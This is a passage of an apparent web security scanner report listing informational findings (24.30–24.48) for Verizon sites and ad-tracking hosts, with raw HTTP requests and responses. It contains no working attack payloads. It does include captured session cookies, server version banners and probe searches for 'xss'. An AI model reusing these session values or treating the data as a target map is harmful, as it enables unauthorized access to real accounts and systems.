User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:42:17 GMT
Content-Length: 18539

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Verizon
...[SNIP]...

24.30. http://s.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /meta

Request

GET /meta?_o=15772&_t=ghp&ssv_random=27&ssv_callback=SetXP1Placements&ssv_003=&ssv_004=&ssv_005=&ssv_006=&ssv_007=&ssv_008=&ssv_009=&ssv_010=&ssv_011=&ssv_012=0&ssv_013=0&ssv_014=807&ssv_015=&ssv_016= HTTP/1.1
Host: s.xp1.ru4.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Cookie: X1ID=BO-00000000521444319; O1807966=768; P1807966=c3N2X2MzfFl8MTMxMjc2OTY3N3xzc3ZfYnxjM3wxMzEyNzY5Njc3fHNzdl8xfDI4NTQ0NTM5OHwxMzEyNzY5Njc3fA==; M62795-97956=1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 05 Sep 2011 22:14:30 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 1621610-B22941263=0|0|0|0|0|22946267|22946266|-1; domain=.ru4.com; path=/
Set-cookie: P15772=; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT
Content-type: text/html
Content-length: 1487
X-Cnection: close

SetXP1Placements({
"xp1_placement1": {
"creativeID": "GHP_OT_HSIDL3M_DEF",
"clickURL": "http://s.xp1.ru4.com/click?_o=15772&_n=62795&_c=1621610&_x=17344902&_b=17344904&_d=0
...[SNIP]...

24.31. http://sales.liveperson.net/visitor/addons/deploy.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Request

GET /visitor/addons/deploy.asp HTTP/1.1
Host: sales.liveperson.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 05 Sep 2011 22:35:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 424
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQQTCTSA=HLKAPFHCLMLFMHDAOAJLLEPA; path=/
Cache-control: private

//Plugins for site
<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=2>Invalid Path Character(s)</font>

...[SNIP]...

24.32. http://search.verizon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.verizon.com
Path:   /

Request

GET /?tp=l&rv=l&q=xss&search.x=0&search.y=0 HTTP/1.1
Host: search.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; hbxRet=Y; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=xss%20sq~~~~

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:17:49 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Content-Length: 50685


                   <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" type="text/css" href="https://www22.verizon.com/in
...[SNIP]...

24.33. https://secure.opinionlab.com/rate36_json.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /rate36_json.asp

Request

GET /rate36_json.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
Cool01: Opinionlab - Cool01
Date: Mon, 05 Sep 2011 22:35:43 GMT
Connection: close

invalid call method

24.34. https://secure.opinionlab.com/rate36s.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /rate36s.asp

Request

GET /rate36s.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19
Content-Type: text/html
Cool01: Opinionlab - Cool01
Date: Mon, 05 Sep 2011 22:35:43 GMT
Connection: close

invalid call method

24.35. http://tags.bluekai.com/site/4335

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/4335

Request

GET /site/4335?ret=html&r=73197&phint=lpLanguage%3Denglish&phint=vzserve%3Dhttps%3A%2F%2Fmyaccount.verizonwireless.com&phint=Keywords%3DVerizon%20Wireless%2CCell%20Phones%2CMobile%20Phones%2CCellular%20Phone%2CCell%20Phone&phint=googlebot%3DNOODP&phint=bk_t%3DCell%20Phones%20-%20Smartphones%3A%20Cell%20Phone%20Service%2C%20Accessories%20-%20Verizon%20Wireless&phint=bk_k%3DVerizon%20Wireless%2CCell%20Phones%2CMobile%20Phones%2CCellular%20Phone%2CCell%20Phone&phint=bk_pr%3Dhttp%3A%2F%2Fwww22.verizon.com%2Fcontent%2Fverizonglobalhome%2Fghp_landing.aspx HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BKIgnore=1

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:16:04 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
BK-Server: 497b
Content-Length: 40
Content-Type: text/html

<html><head></head><body></body></html>

24.36. http://tags.bluekai.com/site/4357

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/4357

Request

GET /site/4357?ret=html&r=77101&phint=hc3%3D%7C&phint=logInDisplay%3D1&phint=lpLanguage%3Denglish&phint=lpMarket%3Dgeneric&phint=Keywords%3DCell%20Phone%20Deals%2C%20Cell%20Phone%20Discounts%2C%20Online%20Specials%2C%20Packages&phint=bk_t%3DCell%20Phone%20Savings%20%26%20Discounts%20-%20Verizon%20Wireless&phint=bk_k%3DCell%20Phone%20Deals%2C%20Cell%20Phone%20Discounts%2C%20Online%20Specials%2C%20Packages&phint=bk_pr%3Dhttp%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Findex.html HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/promotion/specialoffers.jsp
Cookie: bk=Avt5BqOGErjMq/0A; bkc=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; bko=KJyfJLg96vIjbL4/z/meQzsNJCg/ZLEsynOPh5Kw7VWiBTEahcYSiTsCaXCijJeMCfcmzLBRF6xQnYSsmfyyLDxQbhGwuW0VMTcCCj3BcpmeJJEa0999eLDR4Q==; bkp1=; bku=kQ199JnSvDfyUEoR; bkw5=KJ0aAEWFxNWRCodgovoUDexueejB3qEWx/CK5IC9O6HP/0kdxLHW5OYdys/0ZiPZnOJJ/lb9Yn6JZ6cRhc4zb3Z6V1T8IjfFdqTlfdAR9FGXqrV0tDieHzQImTufRjdRz7P0Bso/mx8rp1BoDNJfsyBauzUfAU123zI+9QxEHC2k5+pGHbEceU7zOvs50zUsILiW5waYyRJrGkmBrtnuCUMHUHWt8dy+bPtTZ/a6hVV968xZJjU3CUlc2f2y3V+wM7ctAppdugxZ/B1DPsqVmbr42jXibKowXOCLQMecXtjfVBb64iKZSLC2hAd8YAtr1TqAJa5SwajkVQKJJDBtk7tiANaL8dNA+/X2/SbxP6FdIV1VZAPMPElf0RqLXbvrEO2xZPiL6UPHpMqI381PLp49xXfLczCgd4rUwApwZL0+fF6gLUGd7bxjCET=; bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRxmpb4IudROueYy1ZHDRAFtS3UT9BE6nNx==; bkst=KJhBEf+v9NWDwWP91aWetZGPLwcY7FrIVrQSPyCZN6i/uL9irlzUJuxH1Ri2k7bOvqVhLTiPkHXQPGodTu5T5b+15jQj8L0DTc6KcvqgmNWJw+h5Q8C8BOaVWYA0ugiUS5/pNJ9AkMEVNiS2Nsh+qpFdkdwwyUMRcT8rC+IP6aadMkGsokO0vxPcnqDVE9MpVXCl84yeE87CUcZWoSi/PiRM6ioameG/0twHLtINlw2z7F7yDaYgaR9P/YQ1SrGhxjWpoEtMI5BMyIkgYy9PbcSwg68lypTm2iXZjlrm4NZzijGVDj2n9O+x2TBtzBeLBgBsJh3xTvHNKblwO2AGeeSpP7HTPOIwnGwx2TBmdS5RAPEpYAyZ1+q1/CD357rHozAWzFtIZk59e0VEDi3rLwl3HddTzNKo; __utma=252226138.2034852110.1313672419.1313672419.1313681721.2; __utmz=252226138.1313681721.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; bklc=4e65298f; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:15:21 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=ht88uCDC+h5Mq/0A; expires=Sat, 03-Mar-2012 22:15:21 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Tue, 06-Sep-2011 22:15:21 GMT; path=/; domain=.bluekai.com
BK-Server: 497b
Content-Length: 77
Content-Type: text/html

<html>
<head>
</head>
<body>
<div id="bk_exchange">

</div>

</body>
</html>

24.37. http://verizon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://verizon.com
Path:   /

Request

GET / HTTP/1.1
Host: verizon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __switchTo5x=51; __unam=49dc76-1323a4a13fb-1bbb4ff9-1

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 05 Sep 2011 22:27:38 GMT
Content-length: 11095
Content-type: text/html
Etag: "6d27ef85-1-0-2b57"
Last-modified: Mon, 04 Oct 2010 17:07:03 GMT
Accept-ranges: bytes

<html>
<head>

<!-- START OF SDC Advanced Tracking Code -->
<!-- Copyright (c) 1996-2005 WebTrends Inc. All rights reserved. -->
<!-- V8.0 -->
<!-- $DateTime: 2006/06/12 17:01:57 $ -->
<SCRIPT
...[SNIP]...

24.38. http://verizonconnections.vzcomportal.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://verizonconnections.vzcomportal.com
Path:   /

Request

GET / HTTP/1.1
Host: verizonconnections.vzcomportal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 18 Jul 2011 18:34:50 GMT
Accept-Ranges: bytes
ETag: "0418b607945cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:19:03 GMT
Content-Length: 4652

<!doctype html>
<!--[if lt IE 7 ]> <html class="no-js ie ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie ie7" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js ie ie8" l
...[SNIP]...

24.39. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

Summary

Severity:   Information
Confidence:   Certain
Host:   http://verizonwireless.tt.omtrdc.net
Path:   /m2/verizonwireless/mbox/standard

Request

GET /m2/verizonwireless/mbox/standard?mboxHost=www.verizonwireless.com&mboxSession=1315278939788-568601&mboxPage=1315278939788-568601&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=910&browserTimeOffset=-300&colorDepth=16&mboxCount=17&mbox=Prospects_RightMinorPromoBox&mboxId=0&mboxTime=1315260961648&mboxURL=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Findex.html&mboxReferrer=http%3A%2F%2Fwww22.verizon.com%2Fcontent%2Fverizonglobalhome%2Fghp_landing.aspx&mboxVersion=40 HTTP/1.1
Host: verizonwireless.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:11:17 GMT
Connection: close
Content-Type: text/html

// ERROR: application server timeout.
if (mboxVersion >= 33) {
mboxFactories.get('default').getMboxes().each(function(m){m.setOffer(new mboxOfferDefault()).loaded();});
} else if (mboxVersion >= 31)
...[SNIP]...

24.40. http://webmail.verizonemail.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.verizonemail.net
Path:   /

Request

GET / HTTP/1.1
Host: webmail.verizonemail.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0.0_03c
Date: Mon, 05 Sep 2011 22:41:54 GMT
Content-length: 162
Content-type: text/html
Etag: "b1f727c1-1-0-a2"
Last-modified: Sun, 13 Feb 2005 21:46:37 GMT
Accept-ranges: bytes

<HTML>
<HEAD><TITLE>Verizon Central</TITLE>
<META HTTP-EQUIV=Refresh CONTENT="0; URL=/webmail/servlet/HttpNimletDriver?nimlet=LoginNimlet&site=B">
</HEAD>
</HTML>

24.41. http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.verizonemail.net
Path:   /webmail/servlet/HttpNimletDriver

Request

GET /webmail/servlet/HttpNimletDriver?nimlet=LoginNimlet&site=B HTTP/1.1
Host: webmail.verizonemail.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizonemail.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Application-Server/7.0.0_03c
Date: Mon, 05 Sep 2011 22:41:55 GMT
Content-type: text/html
Expires: Wed, 31 Dec 1969 18:00:00 CST
Pragma: No-cache
Cache-control: no-cache
Content-Length: 21251


<html>

<head>
   <title>Verizon E-Mail</title>
<meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l
gen true for "http://web.managedmail
...[SNIP]...

24.42. http://www.connecttoverizon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connecttoverizon.com
Path:   /

Request

GET / HTTP/1.1
Host: www.connecttoverizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:19:14 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:19:14 GMT
X-Powered-By: PHP/5.2.3
Content-Type: text/html
Content-Length: 32212

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Order Verizon Phone,
...[SNIP]...

24.43. http://www.connecttoverizon.com/loginFailed.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connecttoverizon.com
Path:   /loginFailed.html

Request

GET /loginFailed.html?uname=xss&Go.x=26&Go.y=3&loginPageUrl=http%3A%2F%2Fwww.connecttoverizon.com&Go=Submit&loginFailedUrl=http%3A%2F%2Fwww.connecttoverizon.com%2FloginFailed.html&id=1053268 HTTP/1.1
Host: www.connecttoverizon.com
Proxy-Connection: keep-alive
Referer: http://www.connecttoverizon.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; s_sq=pcwhitefencecom%3D%2526pid%253DConnectToVerizon-Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.connecttoverizon.com/objects/images/spacer.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:20:17 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:20:17 GMT
X-Powered-By: PHP/5.2.3
Content-Type: text/html
Content-Length: 12507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Failed | C
...[SNIP]...

24.44. http://www.connecttoverizon.com/order-now.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connecttoverizon.com
Path:   /order-now.html

Request

GET /order-now.html HTTP/1.1
Host: www.connecttoverizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:08 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Tue, 06 Sep 2011 22:36:08 GMT
X-Powered-By: PHP/5.2.3
Connection: close
Content-Type: text/html
Content-Length: 13969

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>ConnectToVerizon
...[SNIP]...

24.45. http://www.verizon.com/fiostv

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizon.com
Path:   /fiostv

Request

GET /fiostv HTTP/1.1
Host: www.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "6282dbf2577831504cc275f53753f4ee:1248144899"
Last-Modified: Tue, 21 Jul 2009 02:54:59 GMT
Accept-Ranges: bytes
Content-Length: 11130
Content-Type: text/html
Date: Mon, 05 Sep 2011 22:18:28 GMT
Connection: close

<html>
<head>

<!-- START OF SDC Advanced Tracking Code -->
<!-- Copyright (c) 1996-2005 WebTrends Inc. All rights reserved. -->
<!-- V8.0 -->
<!-- $DateTime: 2006/06/12 17:01:57 $ -->
<SCRIPT
...[SNIP]...

24.46. http://www.verizonbusiness.com/Medium/about/promotions/ida_t1/%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/about/promotions/ida_t1/%20

Request

GET /Medium/about/promotions/ida_t1/%20 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Last-Modified: Mon, 05 Sep 2011 22:36:37 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 22720
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:36:37 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:36:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(13:09:02)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

24.47. http://www22.verizon.com/copyright

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /copyright

Request

GET /copyright HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Content-Type: text/html
Expires: Mon, 05 Sep 2011 22:37:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:54 GMT
Content-Length: 285
Connection: close

<!-- Vignette V6 Mon Sep 05 18:37:54 2011 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <title>Verizon</title>
   <meta http-equiv="refresh" content="0;URL=htt
...[SNIP]...

24.48. http://www22.verizon.com/wholesale/solutions/solution/physical%2bcollo.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /wholesale/solutions/solution/physical%2bcollo.html

Request

GET /wholesale/solutions/solution/physical%2bcollo.html HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://search.verizon.com/?market=94531+zz&q=oss+sq&rv=b&st=zz&tp=c&u1=q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
